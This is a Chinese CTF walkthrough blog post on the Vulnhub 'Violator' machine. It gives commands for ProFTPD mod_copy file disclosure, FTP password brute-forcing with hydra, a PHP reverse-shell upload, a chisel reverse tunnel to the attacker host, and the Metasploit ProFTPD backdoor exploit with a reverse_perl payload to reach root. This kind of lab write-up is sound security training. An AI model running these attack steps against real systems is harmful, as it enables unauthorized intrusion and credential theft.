[Vulnhub] violator ProFTPD+权限提升

信息收集

IP addressOpening Ports
192.168.101.148TCP:21,80,2121

$ nmap -p- 192.168.101.148 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: I Say... I say... I say Boy! You pumpin' for oil or somethin'...?
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Unix

ProFTPD 本地权限

ftp> site cpfr /proc/self/root

ftp> site cpto /var/www/html/root

image.png

http://192.168.101.148/root/

image-1.png

http://192.168.101.148/root/etc/passwd

image-2.png

$ cewl -v 'https://en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt
$ sed 's/ //g' violator.txt > violator_nospaces
$ cut -d'"' -f2 violator_nospaces | tr '[:upper:]' '[:lower:]' > password.txt

$ hydra -L username.txt -P password.txt ftp://192.168.101.148

username:af
password:enjoythesilence

username:dg
password:policyoftruth

image-3.png

$ cp /usr/share/webshells/php/php-reverse-shell.php /var/www/html

(dg)$ ftp 192.168.101.148

(dg)ftp> put /var/www/html/php-reverse-shell.php

http://192.168.101.148/php-reverse-shell.php

image-5.png

ProFTPD backdoor 权限提升

www-data@violator:/$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@violator:/$ su dg

image-6.png

dg@violator:/$ sudo -l

image-7.png

image-8.png

dg@violator:/$ cat /home/aw/hint

image-9.png

dg@violator:/$ sudo /home/dg/bd/sbin/proftpd

dg@violator:/$ netstat -lnput

image-10.png

telnet 127.0.0.1 2121

image-11.png

echo dg ALL=\(ALL:ALL\) ALL > /tmp/dg

image-12.png

$ chisel server -p 8000 --reverse

dg@violator:/$ ./chisel client 192.168.101.128:8000 R:2121:127.0.0.1:2121&

$ msfconsole
use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
msf exploit(proftpd_133c_backdoor) > set lhost 192.168.101.128
msf exploit(proftpd_133c_backdoor) > set rhost 127.0.0.1
msf exploit(proftpd_133c_backdoor) > set rport 2121
msf exploit(proftpd_133c_backdoor) > exploit

image-14.png

cat /root/flag.txt

image-15.png

image-16.png

root@violator:/root# python3 -m http.server 9999

image-17.png

$ rar2john crocs.rar > hash

$ john hash --wordlist=../Desktop/password.txt

password:World in My Eyes

image-18.png

$ unrar x crocs.rar

image-19.png

image-20.png

使用image to ascii 工具来查看图片信息

https://github.com/MartinxMax/ImageToAscii

image-21.png

$ exiftool artwork.jpg

image-22.png

image-23.png

https://www.dcode.fr/enigma-machine-cipher

ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE INTO KEEP YOU ON YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR SHOUTOUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN KNIGHTMARE
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值